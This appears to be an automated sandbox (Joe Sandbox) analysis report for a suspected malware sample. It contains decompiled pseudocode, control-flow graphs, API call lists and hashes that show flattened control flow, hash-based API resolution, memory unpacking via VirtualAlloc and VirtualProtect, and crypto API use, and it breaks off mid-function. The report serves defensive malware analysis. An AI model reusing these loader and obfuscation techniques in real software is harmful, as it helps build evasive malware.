                                                        				while(1) {
                                                        					L1:
                                                        					goto L2;
                                                        					do {
                                                        						while(1) {
                                                        							L2:
                                                        							_t131 = _t58 - 0xea5411f;
                                                        							if(_t131 > 0) {
                                                        								break;
                                                        							}
                                                        							if(_t131 == 0) {
                                                        								_t73 = E006234C0(0x62d970);
                                                        								_t122 =  *0x62e158;
                                                        								_t127 = _t73;
                                                        								if(_t122 == 0) {
                                                        									_t122 = E00623E60(_t96, E00623F00(0xc6fbcd74), 0xba71dd03, _t128);
                                                        									 *0x62e158 = _t122;
                                                        								}
                                                        								_t101 =  *0x62e54c; // 0x8ddff8
                                                        								_t50 = _t101 + 0x260; // 0x8de258
                                                        								_t51 = _t101 + 0x18; // 0x8de010
                                                        								 *_t122( &_v524, 0x104, _t127, _t51, _t50);
                                                        								_t78 =  *0x62e494;
                                                        								_t129 =  &(_t129[5]);
                                                        								if(_t78 == 0) {
                                                        									_t83 = E00623F00(0x9bab0b12);
                                                        									_t122 = 0x7facde30;
                                                        									_t78 = E00623E60(_t96, _t83, 0x7facde30, _t128);
                                                        									 *0x62e494 = _t78;
                                                        								}
                                                        								_t125 =  *_t78();
                                                        								_t80 =  *0x62df30;
                                                        								if(_t80 == 0) {
                                                        									_t82 = E00623F00(0x9bab0b12);
                                                        									_t122 = 0x5010a54d;
                                                        									_t80 = E00623E60(_t96, _t82, 0x5010a54d, _t128);
                                                        									 *0x62df30 = _t80;
                                                        								}
                                                        								 *_t80(_t125, 0, _t127);
                                                        								_t58 = 0x2c2d24c8;
                                                        								goto L1;
                                                        							} else {
                                                        								if(_t58 == 0x2f64d8b) {
                                                        									_t86 =  *0x62e1d4;
                                                        									if(_t86 == 0) {
                                                        										_t88 = E00623F00(0x9bab0b12);
                                                        										_t122 = 0xa229df38;
                                                        										_t86 = E00623E60(_t96, _t88, 0xa229df38, _t128);
                                                        										 *0x62e1d4 = _t86;
                                                        									}
                                                        									 *_t86( &_v572);
                                                        									_t58 = 0xc5e088d;
                                                        									continue;
                                                        								} else {
                                                        									if(_t58 == 0x6f65414) {
                                                        										_t89 = _v568;
                                                        										_t105 = _v572;
                                                        										_v560 = _t89;
                                                        										_v552 = _t89;
                                                        										_v544 = _t89;
                                                        										_v536 = _t89;
                                                        										_t90 =  *0x62dee4;
                                                        										_v564 = _t105;
                                                        										_v556 = _t105;
                                                        										_v548 = _t105;
                                                        										_v540 = _t105;
                                                        										_v532 = 0;
                                                        										if(_t90 == 0) {
                                                        											_t92 = E00623F00(0x9bab0b12);
                                                        											_t122 = 0x4bf45878;
                                                        											_t90 = E00623E60(_t96, _t92, 0x4bf45878, _t128);
                                                        											 *0x62dee4 = _t90;
                                                        										}
                                                        										 *_t90(_t128, 0,  &_v564, 0x28);
                                                        										_t58 = 0x3557bd8c;
                                                        										_t96 =  !=  ? 1 : _t96;
                                                        										continue;
                                                        									} else {
                                                        										if(_t58 != 0xc5e088d) {
                                                        											goto L24;
                                                        										} else {
                                                        											_v580 = 0xa8c00;
                                                        											_v576 = 0;
                                                        											_v596 = E0062B6E0(_v580, _v576, 0x989680, 0);
                                                        											_v592 = _t122;
                                                        											_v588 = _v588 - _v596;
                                                        											_t58 = 0xea5411f;
                                                        											asm("sbb [esp+0x2c], ecx");
                                                        											continue;
                                                        										}
                                                        									}
                                                        								}
                                                        							}
                                                        							L35:
                                                        						}
                                                        						if(_t58 == 0x2c2d24c8) {
                                                        							if( *0x62de04 == 0) {
                                                        								_t66 = E00623F00(0x9bab0b12);
                                                        								_t122 = 0xb66d748a;
                                                        								 *0x62de04 = E00623E60(_t96, _t66, 0xb66d748a, _t128);
                                                        							}
                                                        							_t64 = CreateFileW( &_v524, _v584, _v596, 0, _v592, _v588, 0); // executed
                                                        							_t128 = _t64;
                                                        							if(_t128 == 0xffffffff) {
                                                        								goto L34;
                                                        							} else {
                                                        								_t58 = 0x6f65414;
                                                        								goto L2;
                                                        							}
                                                        						} else {
                                                        							if(_t58 == 0x343bfd89) {
                                                        								_t58 = 0x2f64d8b;
                                                        								goto L2;
                                                        							} else {
                                                        								if(_t58 == 0x3557bd8c) {
                                                        									if( *0x62de3c == 0) {
                                                        										 *0x62de3c = E00623E60(_t96, E00623F00(0x9bab0b12), 0x20de7595, _t128);
                                                        									}
                                                        									CloseHandle(_t128); // executed
                                                        									L34:
                                                        									return _t96;
                                                        								} else {
                                                        									goto L24;
                                                        								}
                                                        							}
                                                        						}
                                                        						goto L35;
                                                        						L24:
                                                        					} while (_t58 != 0xcfe8e);
                                                        					return _t96;
                                                        					goto L35;
                                                        				}
                                                        			}













































                                                        0x006280a0
                                                        0x006280a0
                                                        0x006280a6
                                                        0x006280ae
                                                        0x006280b3
                                                        0x006280bb
                                                        0x006280c3
                                                        0x006280ca
                                                        0x006280ce
                                                        0x006280d2
                                                        0x006280d9
                                                        0x006280e0
                                                        0x006280e7
                                                        0x006280ee
                                                        0x006280f5
                                                        0x006280fc
                                                        0x00628103
                                                        0x00628112
                                                        0x00628116
                                                        0x00628119
                                                        0x0062811d
                                                        0x00628125
                                                        0x00628133
                                                        0x00628137
                                                        0x0062813f
                                                        0x00628147
                                                        0x0062814f
                                                        0x00628153
                                                        0x0062815b
                                                        0x00628163
                                                        0x00628163
                                                        0x00628168
                                                        0x00628170
                                                        0x00628170
                                                        0x00628170
                                                        0x00628170
                                                        0x00628175
                                                        0x00000000
                                                        0x00000000
                                                        0x0062817b
                                                        0x0062828c
                                                        0x00628291
                                                        0x00628297
                                                        0x0062829b
                                                        0x006282b3
                                                        0x006282b5
                                                        0x006282b5
                                                        0x006282bb
                                                        0x006282c1
                                                        0x006282c8
                                                        0x006282d7
                                                        0x006282d9
                                                        0x006282de
                                                        0x006282e3
                                                        0x006282ea
                                                        0x006282ef
                                                        0x006282f6
                                                        0x006282fb
                                                        0x006282fb
                                                        0x00628302
                                                        0x00628304
                                                        0x0062830b
                                                        0x00628312
                                                        0x00628317
                                                        0x0062831e
                                                        0x00628323
                                                        0x00628323
                                                        0x0062832c
                                                        0x0062832e
                                                        0x00000000
                                                        0x00628181
                                                        0x00628186
                                                        0x00628252
                                                        0x00628259
                                                        0x00628260
                                                        0x00628265
                                                        0x0062826c
                                                        0x00628271
                                                        0x00628271
                                                        0x0062827b
                                                        0x0062827d
                                                        0x00000000
                                                        0x0062818c
                                                        0x00628191
                                                        0x006281e3
                                                        0x006281e7
                                                        0x006281eb
                                                        0x006281ef
                                                        0x006281f3
                                                        0x006281f7
                                                        0x006281fb
                                                        0x00628200
                                                        0x00628204
                                                        0x00628208
                                                        0x0062820c
                                                        0x00628210
                                                        0x0062821a
                                                        0x00628221
                                                        0x00628226
                                                        0x0062822d
                                                        0x00628232
                                                        0x00628232
                                                        0x00628241
                                                        0x00628245
                                                        0x0062824a
                                                        0x00000000
                                                        0x00628193
                                                        0x00628198
                                                        0x00000000
                                                        0x0062819e
                                                        0x006281a0
                                                        0x006281a8
                                                        0x006281c4
                                                        0x006281c8
                                                        0x006281d4
                                                        0x006281d8
                                                        0x006281dd
                                                        0x00000000
                                                        0x006281dd
                                                        0x00628198
                                                        0x00628191
                                                        0x00628186
                                                        0x00000000
                                                        0x0062817b
                                                        0x0062833d
                                                        0x00628377
                                                        0x0062837e
                                                        0x00628383
                                                        0x00628391
                                                        0x00628391
                                                        0x006283b4
                                                        0x006283b6
                                                        0x006283bb
                                                        0x00000000
                                                        0x006283bd
                                                        0x006283bd
                                                        0x00000000
                                                        0x006283bd
                                                        0x0062833f
                                                        0x00628344
                                                        0x00628365
                                                        0x00000000
                                                        0x00628346
                                                        0x0062834b
                                                        0x006283ce
                                                        0x006283e6
                                                        0x006283e6
                                                        0x006283ec
                                                        0x006283f1
                                                        0x006283fa
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x0062834b
                                                        0x00628344
                                                        0x00000000
                                                        0x0062834d
                                                        0x0062834d
                                                        0x00628364
                                                        0x00000000
                                                        0x00628364

                                                        APIs
                                                        • CreateFileW.KERNELBASE(?,?,?,00000000,?,?,00000000,?,3251FEFE,?,?), ref: 006283B4
                                                        • CloseHandle.KERNELBASE(?,?,3251FEFE,?,?), ref: 006283EC
                                                        Memory Dump Source
                                                        • Source File: 0000000E.00000002.2292162710.0000000000621000.00000020.00000001.sdmp, Offset: 00620000, based on PE: true
                                                        • Associated: 0000000E.00000002.2292147578.0000000000620000.00000004.00000001.sdmp Download File
                                                        • Associated: 0000000E.00000002.2292182201.000000000062D000.00000004.00000001.sdmp Download File
                                                        • Associated: 0000000E.00000002.2292198739.000000000062F000.00000002.00000001.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_14_2_620000_cryptdll.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CloseCreateFileHandle
                                                        • String ID:
                                                        • API String ID: 3498533004-0
                                                        • Opcode ID: 0b6ce53e28fd67440e6a2a604a9701c1596f3125581d394d2d34e572efdb7926
                                                        • Instruction ID: 4dc6b3093db45a33b6b9054c2b79643765d86dc5d162fa7f812b410e50b5b262
                                                        • Opcode Fuzzy Hash: 0b6ce53e28fd67440e6a2a604a9701c1596f3125581d394d2d34e572efdb7926
                                                        • Instruction Fuzzy Hash: 5981B070609B218FD758DF68EC4466BB7E6AB94744F00082EF185CB390EB78DD068F96
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 580 610580-6105be call 610ed0 583 6105c0-6105cf 580->583 584 6105d2-6105da 580->584 585 6105e0-6105e3 584->585 586 6106e7-6106ef 584->586 585->586 587 6105e9-6105eb 585->587 587->586 589 6105f1-6105fc 587->589 589->586 590 610602-610607 589->590 591 6106d8-6106e4 590->591 592 61060d-610629 call 611140 RtlMoveMemory 590->592 595 610654-610659 592->595 596 61062b-610630 592->596 599 61065b-61066a 595->599 600 61066c-610678 595->600 597 610643-610652 596->597 598 610632-610641 596->598 601 610679-610699 call 611140 597->601 598->601 599->601 600->601 601->586 604 61069b-6106a3 VirtualProtect 601->604 605 6106a5-6106a8 604->605 606 6106c6-6106d5 604->606 605->586 607 6106aa-6106ad 605->607 607->586 608 6106af-6106b1 607->608 608->592 609 6106b7-6106c3 608->609
                                                        APIs
                                                          • Part of subcall function 00610FB0: RtlMoveMemory.NTDLL(00000000,?,00000040), ref: 00610F08
                                                          • Part of subcall function 00610FB0: RtlMoveMemory.NTDLL(00000000,?,000000F8), ref: 00610F3E
                                                          • Part of subcall function 00610FB0: RtlMoveMemory.NTDLL(00000000,00000000,000000F8), ref: 00610F7F
                                                        • RtlMoveMemory.NTDLL(00000000,-00000018,00000028), ref: 0061061B
                                                        • VirtualProtect.KERNEL32(00000000,-00000018,?,00000000,00000000,00000000,-00000018,00000028,?,?,?,00000000,00000000,?,00000000), ref: 0061069C
                                                        Memory Dump Source
                                                        • Source File: 0000000E.00000002.2292138449.0000000000610000.00000040.00000001.sdmp, Offset: 00610000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_14_2_610000_cryptdll.jbxd
                                                        Similarity
                                                        • API ID: MemoryMove$ProtectVirtual
                                                        • String ID:
                                                        • API String ID: 4043890290-0
                                                        • Opcode ID: b94b9ae67b6adb9e0137934aeccaac81b37d054c99ee4087dee3bfd6cde587a0
                                                        • Instruction ID: 4b2f037bdf8f091a50015758410b66cba27b4c2b38973683b9d87bf8fb27a805
                                                        • Opcode Fuzzy Hash: b94b9ae67b6adb9e0137934aeccaac81b37d054c99ee4087dee3bfd6cde587a0
                                                        • Instruction Fuzzy Hash: BA3178B365420127FB24DA2ADC45BEBA3C6EBD1354F0C083AFA04C2240D5AED5E8C2A5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 610 625ce0-625cec call 6265e0 613 625d09-625d0d ExitProcess 610->613 614 625cee-625d04 call 623f00 call 623e60 610->614 614->613
                                                        C-Code - Quality: 100%
                                                        			_entry_() {
                                                        				void* _t5;
                                                        				void* _t9;
                                                        
                                                        				E006265E0();
                                                        				if( *0x62ddb8 == 0) {
                                                        					 *0x62ddb8 = E00623E60(_t5, E00623F00(0x9bab0b12), 0x89f3d704, _t9);
                                                        				}
                                                        				ExitProcess(0);
                                                        			}





                                                        0x00625ce0
                                                        0x00625cec
                                                        0x00625d04
                                                        0x00625d04
                                                        0x00625d0b

                                                        APIs
                                                        • ExitProcess.KERNELBASE(00000000), ref: 00625D0B
                                                        Memory Dump Source
                                                        • Source File: 0000000E.00000002.2292162710.0000000000621000.00000020.00000001.sdmp, Offset: 00620000, based on PE: true
                                                        • Associated: 0000000E.00000002.2292147578.0000000000620000.00000004.00000001.sdmp Download File
                                                        • Associated: 0000000E.00000002.2292182201.000000000062D000.00000004.00000001.sdmp Download File
                                                        • Associated: 0000000E.00000002.2292198739.000000000062F000.00000002.00000001.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_14_2_620000_cryptdll.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ExitProcess
                                                        • String ID:
                                                        • API String ID: 621844428-0
                                                        • Opcode ID: a632808080fbf35f54b82d6e395d074edbda95140617d92901577043beb0cf2b
                                                        • Instruction ID: 5649396b6e66a87ce5725702e5a25016dc997b52fd2eba9df758be38a3cfe5a0
                                                        • Opcode Fuzzy Hash: a632808080fbf35f54b82d6e395d074edbda95140617d92901577043beb0cf2b
                                                        • Instruction Fuzzy Hash: 52D0C930744E3546DBA4ABB5B84576A259B4FA0748F10581EF411CB3DAEE248911AB58
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 619 610ad0-610b31 call 610ed0 622 610b33-610b42 619->622 623 610b47-610b4d 619->623 624 610d40 622->624 625 610b5f-610b7b 623->625 626 610b4f-610b54 623->626 628 610b90 625->628 629 610b7d-610b8e 625->629 626->625 630 610b96-610b9c 628->630 629->630 632 610bae-610bca 630->632 633 610b9e-610ba3 630->633 635 610bd7-610c21 VirtualAlloc 632->635 636 610bcc-610bd4 632->636 633->632 640 610c27-610c2e 635->640 641 610d1a-610d24 635->641 636->635 642 610c30-610c3f 640->642 643 610c44-610c4b 640->643 641->624 642->624 644 610c5d-610c79 643->644 645 610c4d-610c52 643->645 647 610c86-610c8d 644->647 648 610c7b-610c83 644->648 645->644 649 610c9f-610cbb 647->649 650 610c8f-610c94 647->650 648->647 652 610cc8-610cfa VirtualAlloc 649->652 653 610cbd-610cc5 649->653 650->649 656 610d02-610d07 652->656 653->652 656->641 657 610d09-610d18 656->657 657->624
                                                        APIs
                                                          • Part of subcall function 00610FB0: RtlMoveMemory.NTDLL(00000000,?,00000040), ref: 00610F08
                                                          • Part of subcall function 00610FB0: RtlMoveMemory.NTDLL(00000000,?,000000F8), ref: 00610F3E
                                                          • Part of subcall function 00610FB0: RtlMoveMemory.NTDLL(00000000,00000000,000000F8), ref: 00610F7F
                                                        • VirtualAlloc.KERNEL32(?,?,00000000), ref: 00610BFF
                                                        Memory Dump Source
                                                        • Source File: 0000000E.00000002.2292138449.0000000000610000.00000040.00000001.sdmp, Offset: 00610000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_14_2_610000_cryptdll.jbxd
                                                        Similarity
                                                        • API ID: MemoryMove$AllocVirtual
                                                        • String ID:
                                                        • API String ID: 1654584625-0
                                                        • Opcode ID: 33a83c292423e0fbe2e532dbc4518730eee9e5d53c86213deb289c7390d0b434
                                                        • Instruction ID: 15ceecb7908ff137aa2c9993ea87659b3394163f8a4507db2c084084ac5da06a
                                                        • Opcode Fuzzy Hash: 33a83c292423e0fbe2e532dbc4518730eee9e5d53c86213deb289c7390d0b434
                                                        • Instruction Fuzzy Hash: 8051F470A40218BBEB209B54DE45FEAB7B9EF54701F104095FA08B7290D6F85DC5CFA5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 75%
                                                        			E00627080(void* __ebx, void* __ecx, signed int __edx, void* __eflags) {
                                                        				struct HINSTANCE__* _t6;
                                                        				intOrPtr* _t7;
                                                        				intOrPtr* _t9;
                                                        				intOrPtr _t17;
                                                        				signed int _t28;
                                                        				void* _t29;
                                                        				WCHAR* _t30;
                                                        				void* _t31;
                                                        
                                                        				_t15 = __ebx;
                                                        				_t28 = __edx;
                                                        				_t30 = E006234C0(__ecx);
                                                        				if( *0x62dd1c == 0) {
                                                        					 *0x62dd1c = E00623E60(__ebx, E00623F00(0x9bab0b12), 0xe4b28d97, _t31);
                                                        				}
                                                        				_t6 = LoadLibraryW(_t30);
                                                        				_t17 =  *0x62e548; // 0x917e10
                                                        				 *(_t17 + 0x30 + _t28 * 4) = _t6;
                                                        				_t7 =  *0x62e494;
                                                        				if(_t7 == 0) {
                                                        					_t7 = E00623E60(_t15, E00623F00(0x9bab0b12), 0x7facde30, _t31);
                                                        					 *0x62e494 = _t7;
                                                        				}
                                                        				_t29 =  *_t7();
                                                        				_t9 =  *0x62df30;
                                                        				if(_t9 == 0) {
                                                        					_t9 = E00623E60(_t15, E00623F00(0x9bab0b12), 0x5010a54d, _t31);
                                                        					 *0x62df30 = _t9;
                                                        				}
                                                        				return  *_t9(_t29, 0, _t30);
                                                        			}











                                                        0x00627080
                                                        0x00627082
                                                        0x00627089
                                                        0x00627092
                                                        0x006270aa
                                                        0x006270aa
                                                        0x006270b0
                                                        0x006270b2
                                                        0x006270b8
                                                        0x006270bc
                                                        0x006270c3
                                                        0x006270d6
                                                        0x006270db
                                                        0x006270db
                                                        0x006270e2
                                                        0x006270e4
                                                        0x006270eb
                                                        0x006270fe
                                                        0x00627103
                                                        0x00627103
                                                        0x00627110

                                                        APIs
                                                        • LoadLibraryW.KERNEL32(00000000,?,3251FEFE,0062721D,006268AC), ref: 006270B0
                                                        Memory Dump Source
                                                        • Source File: 0000000E.00000002.2292162710.0000000000621000.00000020.00000001.sdmp, Offset: 00620000, based on PE: true
                                                        • Associated: 0000000E.00000002.2292147578.0000000000620000.00000004.00000001.sdmp Download File
                                                        • Associated: 0000000E.00000002.2292182201.000000000062D000.00000004.00000001.sdmp Download File
                                                        • Associated: 0000000E.00000002.2292198739.000000000062F000.00000002.00000001.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_14_2_620000_cryptdll.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: LibraryLoad
                                                        • String ID:
                                                        • API String ID: 1029625771-0
                                                        • Opcode ID: 829d4cc04045ef2564ae13e431f6c95c7ac99c31cb50657269d09b89fdf4ae8b
                                                        • Instruction ID: 64bea4856d5b2eae2762abf9c2ff77ee8d037a0968beeee47d54d066292e2f10
                                                        • Opcode Fuzzy Hash: 829d4cc04045ef2564ae13e431f6c95c7ac99c31cb50657269d09b89fdf4ae8b
                                                        • Instruction Fuzzy Hash: C201A730714A310B9BA4BF79BD4166B26EB9FD0744710443DA415C7355EF39CD025F85
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                          • Part of subcall function 00610FB0: RtlMoveMemory.NTDLL(00000000,?,00000040), ref: 00610F08
                                                          • Part of subcall function 00610FB0: RtlMoveMemory.NTDLL(00000000,?,000000F8), ref: 00610F3E
                                                          • Part of subcall function 00610FB0: RtlMoveMemory.NTDLL(00000000,00000000,000000F8), ref: 00610F7F
                                                        • VirtualFree.KERNEL32(?,00000000,00008000,?,?,?,?,?,?,?,?), ref: 006102F6
                                                        Memory Dump Source
                                                        • Source File: 0000000E.00000002.2292138449.0000000000610000.00000040.00000001.sdmp, Offset: 00610000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_14_2_610000_cryptdll.jbxd
                                                        Similarity
                                                        • API ID: MemoryMove$FreeVirtual
                                                        • String ID:
                                                        • API String ID: 223123264-0
                                                        • Opcode ID: f2e981a9179681ccb7f8c3dcf060b14378d00665a4bf2a35893dbab2a67e5d97
                                                        • Instruction ID: c08aa1e59275224a9e79f35bea6a99832d69598a42f3b2f59e91f94196eb0dc3
                                                        • Opcode Fuzzy Hash: f2e981a9179681ccb7f8c3dcf060b14378d00665a4bf2a35893dbab2a67e5d97
                                                        • Instruction Fuzzy Hash: 3B5138B1900269ABDF20DF64DD88BDEB779EF88700F044499F509B7250DBB45AC58FA4
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Non-executed Functions

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000E.00000002.2292138449.0000000000610000.00000040.00000001.sdmp, Offset: 00610000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_14_2_610000_cryptdll.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: Eight$Five$Four$Nine$One$Seven$Six$Ten$Three$Two
                                                        • API String ID: 0-211638553
                                                        • Opcode ID: 8cc000d8363efb3f459e751a077807d67fb32520a221421634b6d1961bee58a5
                                                        • Instruction ID: 06e5491952483e4be854ed556e23349e610d97d3371ec7fa27da59902b208087
                                                        • Opcode Fuzzy Hash: 8cc000d8363efb3f459e751a077807d67fb32520a221421634b6d1961bee58a5
                                                        • Instruction Fuzzy Hash: 84313D38E411289BCB04DB98CD81AED7BB6FF4C340B508027D502B37A4DB789986CFA5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 0000000E.00000002.2292138449.0000000000610000.00000040.00000001.sdmp, Offset: 00610000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_14_2_610000_cryptdll.jbxd
                                                        Similarity
                                                        • API ID: MemoryMove
                                                        • String ID:
                                                        • API String ID: 1951056069-0
                                                        • Opcode ID: 0f97f71410d1e41c89ff792c719ec0644fea615ab81a24e4e49035ac14860485
                                                        • Instruction ID: 6a274374a4a38b12ad334f85b1a0accd2dd7400df329226075f2c17df7ab9fbe
                                                        • Opcode Fuzzy Hash: 0f97f71410d1e41c89ff792c719ec0644fea615ab81a24e4e49035ac14860485
                                                        • Instruction Fuzzy Hash: 6851E971A083016BEF90DF26C8417DBB3DA9BD8794F0C052EF548E7240E6B5D9C48796
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 0000000E.00000002.2292138449.0000000000610000.00000040.00000001.sdmp, Offset: 00610000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_14_2_610000_cryptdll.jbxd
                                                        Similarity
                                                        • API ID: MemoryMove
                                                        • String ID:
                                                        • API String ID: 1951056069-0
                                                        • Opcode ID: 8e3fd66f474281e81dfdc8038c3d39c61aa2314e82aa304560e84bd4efe8ca18
                                                        • Instruction ID: 3f4334b764b7a3900112d69a4d886dcc8163ab982db67782f253d0b16b8d1387
                                                        • Opcode Fuzzy Hash: 8e3fd66f474281e81dfdc8038c3d39c61aa2314e82aa304560e84bd4efe8ca18
                                                        • Instruction Fuzzy Hash: 3A4149716143056BEB24DA29DC46BEBB2DBAFC4741F0C483EF640D6241D6B0D5C887A9
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Executed Functions

                                                        Control-flow Graph

                                                        APIs
                                                        • GetCurrentProcess.KERNEL32(00401010,00000000,?), ref: 00460448
                                                          • Part of subcall function 00461140: lstrcpynW.KERNEL32(00000000,00000000,00000000,00000010,00460EFD,00000000), ref: 00461155
                                                        • NtQueryInformationProcess.NTDLL(00000000,00000000,00000000,00000018,00401010), ref: 00460463
                                                        • GetProcessHeap.KERNEL32(?,00401010,00000000,?), ref: 00460484
                                                        • HeapFree.KERNEL32(00000000,00000001,00000000), ref: 0046048D
                                                        • GetProcessHeap.KERNEL32(?,00401010,00000000,?), ref: 00460492
                                                        • RtlAllocateHeap.NTDLL(00000000,00000001,00401010), ref: 0046049F
                                                        • GetCurrentProcess.KERNEL32(?,00401010,00000000,?), ref: 004604A6
                                                        • NtQueryInformationProcess.NTDLL(00000000,00000000,00000000,00401010,00401010), ref: 004604B9
                                                        • RtlMoveMemory.NTDLL(00000000,00000000,00000018), ref: 004604E0
                                                        • RtlMoveMemory.NTDLL(00000000,?,00000014), ref: 004604F7
                                                        • RtlMoveMemory.NTDLL(?,00000000,00000014), ref: 00460519
                                                        • RtlMoveMemory.NTDLL(00000000,00000000,00000024), ref: 00460530
                                                        • RtlMoveMemory.NTDLL(00000000,?,00000048), ref: 00460547
                                                        • RtlMoveMemory.NTDLL(00000000,00000000,00000048), ref: 00460562
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.2335360642.0000000000460000.00000040.00000001.sdmp, Offset: 00460000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_460000_wlanui.jbxd
                                                        Similarity
                                                        • API ID: MemoryMoveProcess$Heap$CurrentInformationQuery$AllocateFreelstrcpyn
                                                        • String ID:
                                                        • API String ID: 482429597-0
                                                        • Opcode ID: 9b0dd4097f43c0ebb4e34693010eb75d6d5af0ab7a67fa55d809036932efe504
                                                        • Instruction ID: 68911fea6f17f78391ef555e3d64a9fc5ad921b276480bb028cfe6591c855db7
                                                        • Opcode Fuzzy Hash: 9b0dd4097f43c0ebb4e34693010eb75d6d5af0ab7a67fa55d809036932efe504
                                                        • Instruction Fuzzy Hash: 4A4151B19143406EE710EB62C846FAFB3EDAB89744F048D1EB744D7251EA7CD9048B6B
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 370 4825e0-4825ec 371 4825f0-4825f6 370->371 372 4827cb-4827d1 371->372 373 4825fc 371->373 374 4828b9-4828bf 372->374 375 4827d7 372->375 376 482779-482780 373->376 377 482602-482608 373->377 384 482765-48276b 374->384 385 4828c5-4828cd 374->385 378 4827dd-4827e3 375->378 379 48287e-482885 375->379 380 48279d-4827b1 376->380 381 482782-482798 call 483f00 call 483e60 376->381 382 48260a 377->382 383 48267b-482681 377->383 388 48282a-482832 378->388 389 4827e5-4827eb 378->389 391 4828a2-4828b4 379->391 392 482887-48289d call 483f00 call 483e60 379->392 401 4827b4-4827c6 380->401 381->380 394 482610-482616 382->394 395 482912-48291f 382->395 396 4826e9-4826f1 383->396 397 482683-482689 383->397 384->371 390 482771-482778 384->390 386 4828ed-482906 385->386 387 4828cf-4828e7 call 483f00 call 483e60 385->387 435 482908-48290d 386->435 436 482972-48297c 386->436 387->386 408 482852-482879 388->408 409 482834-48284c call 483f00 call 483e60 388->409 389->384 403 4827f1-4827f8 389->403 391->371 392->391 410 482618-48261e 394->410 411 48265a-48266b call 4842c0 394->411 406 48293c-482947 395->406 407 482921-482937 call 483f00 call 483e60 395->407 404 482711-482742 396->404 405 4826f3-48270b call 483f00 call 483e60 396->405 397->384 400 48268f-482696 397->400 416 482698-4826ae call 483f00 call 483e60 400->416 417 4826b3-4826e4 CryptDecodeObjectEx 400->417 401->371 419 4827fa-482810 call 483f00 call 483e60 403->419 420 482815-482825 403->420 453 48275f 404->453 454 482744-48275a call 483f00 call 483e60 404->454 405->404 444 482949-48295f call 483f00 call 483e60 406->444 445 482964-482971 406->445 407->406 408->371 409->408 410->384 425 482624-48262b 410->425 411->390 447 482671-482676 411->447 416->417 417->371 419->420 420->371 440 482648-482658 425->440 441 48262d-482643 call 483f00 call 483e60 425->441 435->371 440->371 441->440 444->445 447->371 453->384 454->453
                                                        C-Code - Quality: 56%
                                                        			E004825E0(intOrPtr* __ecx) {
                                                        				char _v4;
                                                        				char _v8;
                                                        				intOrPtr _v32;
                                                        				intOrPtr* _t16;
                                                        				signed int _t17;
                                                        				intOrPtr _t18;
                                                        				intOrPtr* _t21;
                                                        				intOrPtr _t24;
                                                        				intOrPtr* _t25;
                                                        				intOrPtr* _t29;
                                                        				signed int _t30;
                                                        				intOrPtr* _t31;
                                                        				intOrPtr* _t33;
                                                        				intOrPtr* _t38;
                                                        				intOrPtr* _t39;
                                                        				intOrPtr* _t43;
                                                        				intOrPtr _t45;
                                                        				signed int _t46;
                                                        				intOrPtr* _t49;
                                                        				void* _t57;
                                                        				intOrPtr _t59;
                                                        				intOrPtr _t76;
                                                        				intOrPtr _t81;
                                                        				intOrPtr _t87;
                                                        				intOrPtr* _t92;
                                                        				intOrPtr* _t93;
                                                        				intOrPtr* _t100;
                                                        				intOrPtr* _t106;
                                                        				void* _t107;
                                                        				signed int _t108;
                                                        				intOrPtr _t119;
                                                        				void* _t120;
                                                        				void* _t122;
                                                        				void* _t123;
                                                        
                                                        				_t106 = __ecx;
                                                        				_t108 = 0xd12bb4;
                                                        				goto L1;
                                                        				do {
                                                        					while(1) {
                                                        						L1:
                                                        						_t122 = _t108 - 0x2628db0d;
                                                        						if(_t122 > 0) {
                                                        							break;
                                                        						}
                                                        						if(_t122 == 0) {
                                                        							_t16 =  *0x48e4d8;
                                                        							__eflags = _t16;
                                                        							if(_t16 == 0) {
                                                        								_t16 = E00483E60(_t57, E00483F00(0x26f5757c), 0x524c2105, _t120);
                                                        								 *0x48e4d8 = _t16;
                                                        							}
                                                        							_t59 =  *0x48e544; // 0x314640
                                                        							_t17 =  *_t16(_t59 + 0xc, 0, 0, 0x18, 0xf0000040); // executed
                                                        							asm("sbb esi, esi");
                                                        							_t108 = ( ~_t17 & 0x17df3f88) + 0xd8f2d46;
                                                        							continue;
                                                        						} else {
                                                        							_t123 = _t108 - 0xd8f2d46;
                                                        							if(_t123 > 0) {
                                                        								__eflags = _t108 - 0x1d3a2703;
                                                        								if(_t108 == 0x1d3a2703) {
